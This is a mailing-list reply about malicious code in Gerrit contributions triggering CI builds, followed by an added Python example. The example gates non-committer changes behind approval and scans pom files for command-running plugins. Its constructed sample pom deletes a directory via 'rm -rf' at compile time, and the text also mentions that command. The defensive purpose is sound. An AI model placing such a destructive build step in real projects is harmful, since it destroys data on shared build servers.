Re: [eclipse.org-committers] Malicious executable content in Gerrit contributions

On 12/10/2014 03:18 PM, Mikaël Barbero wrote:
> Manual trigger for non-whitelisted users would be a huge regression regarding the contribution workflow (see this comment https://bugs.eclipse.org/bugs/show_bug.cgi?id=375350#c3).
Contributing a change to a pom file that invokes "rm -rf downloads/yourProject" would end in an even bigger regression ;)
> Having to manually promote the latest snapshot build because of low permissions on hudson.eclipse.org is also another possible regression.

I would rather see the HIPP much more isolated from the rest of the Foundation's servers, as suggested in the very same comment.
Could Docker help there? Let's say by making the Gerrit triggers run in a Docker container which can be destroyed safely? Is such a container approach even really safe?

This issue may have already been addressed by other services, e.g. when someone sends a pull request to a project hosted on GitHub with a Travis CI trigger, the build is triggered and can do almost the same amount of damage as we are talking about. Does anybody know how they cope with this?
The GitHub Pull Request Builder Plugin ( https://wiki.jenkins-ci.org/display/JENKINS/GitHub+pull+request+builder+plugin ) requires a trusted person from the project to manually approve the incoming change before a build is kicked off.
--
Mickael Istria
Eclipse developer at JBoss, by Red Hat
My blog - My Tweets
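
The two mechanisms discussed in this message, a whitelist of trusted contributors whose changes build unattended and a manual approval step for everyone else, together with the "pom file that invokes rm -rf" case, as an added example in Python. This is not code from the Eclipse Foundation, the HIPP, or anyone in this thread. It assumes, hypothetically, that the Gerrit trigger hands the job the change owner's e-mail and the new content of each touched file, and that the project's committers form the whitelist; the `Change`, `triage` and `commands_in_pom` names, the `TRUSTED` set and the sample pom are all constructed for the example.

```python
"""Triage of Gerrit-triggered builds for non-whitelisted contributors.

Added example; not code from the Eclipse Foundation, the HIPP, or the
people in this thread. Hypothetical assumptions: the Gerrit trigger hands
the job the change owner's e-mail and the new content of each touched
file, and the project's committers form the whitelist of trusted owners.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Maven plugins whose normal job is to run arbitrary commands during the
# build. A non-whitelisted change that configures them is exactly the
# "rm -rf downloads/yourProject" case from the thread.
COMMAND_PLUGINS = {"exec-maven-plugin", "maven-antrun-plugin"}


@dataclass(frozen=True)
class Change:
    owner: str   # e-mail of the Gerrit change owner
    files: dict  # path -> new content of the file in this change


def _local(tag):
    """Local name of an element tag, ignoring the POM namespace."""
    return tag.rsplit("}", 1)[-1]


def _text(elem):
    return (elem.text or "").strip()


def commands_in_pom(pom_xml):
    """List (plugin, command) pairs for command-running plugins in a pom.

    exec-maven-plugin: <executable> followed by its <argument>s.
    maven-antrun-plugin: each <exec executable=...> task with its <arg>s.
    """
    found = []
    for plugin in ET.fromstring(pom_xml).iter():
        if _local(plugin.tag) != "plugin":
            continue
        artifact = next((_text(c) for c in plugin if _local(c.tag) == "artifactId"), "")
        if artifact not in COMMAND_PLUGINS:
            continue
        words = []
        for node in plugin.iter():
            tag = _local(node.tag)
            if tag in ("executable", "argument"):
                words.append(_text(node))
            elif tag == "exec":
                words.append(node.get("executable", "?"))
                words.extend(a.get("value") or a.get("line") or ""
                             for a in node if _local(a.tag) == "arg")
        found.append((artifact, " ".join(w for w in words if w)))
    return found


def triage(change, trusted):
    """Return ("auto-build", []) or ("needs-approval", findings).

    Whitelisted owners build unattended. Everyone else waits for a trusted
    person, who gets a list of what the change could execute on the build
    machine so the approval is an informed one rather than a rubber stamp.
    """
    if change.owner in trusted:
        return "auto-build", []
    findings = []
    for path, content in sorted(change.files.items()):
        if path.endswith("pom.xml"):
            for plugin, cmd in commands_in_pom(content):
                findings.append(f"{path}: {plugin} runs `{cmd}`")
        elif path.endswith(".sh"):
            findings.append(f"{path}: build script changed")
    return "needs-approval", findings


# Constructed sample: a pom that deletes a directory at compile time.
MALICIOUS_POM = """<?xml version="1.0"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>org.example</groupId>
  <artifactId>demo</artifactId>
  <version>1</version>
  <build><plugins><plugin>
    <groupId>org.codehaus.mojo</groupId>
    <artifactId>exec-maven-plugin</artifactId>
    <executions><execution>
      <phase>compile</phase><goals><goal>exec</goal></goals>
    </execution></executions>
    <configuration>
      <executable>rm</executable>
      <arguments><argument>-rf</argument><argument>downloads/yourProject</argument></arguments>
    </configuration>
  </plugin></plugins></build>
</project>"""

TRUSTED = {"committer@example.org"}  # constructed whitelist

if __name__ == "__main__":
    for owner in ("committer@example.org", "newcomer@example.com"):
        print(owner, triage(Change(owner, {"pom.xml": MALICIOUS_POM}), TRUSTED))
```

Note that the scan only informs the approver; it is not a substitute for the approval. A change that touches nothing but a .java file can still run arbitrary code through a test, which is why the whitelist gate above holds every non-committer change regardless of what the scan finds.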
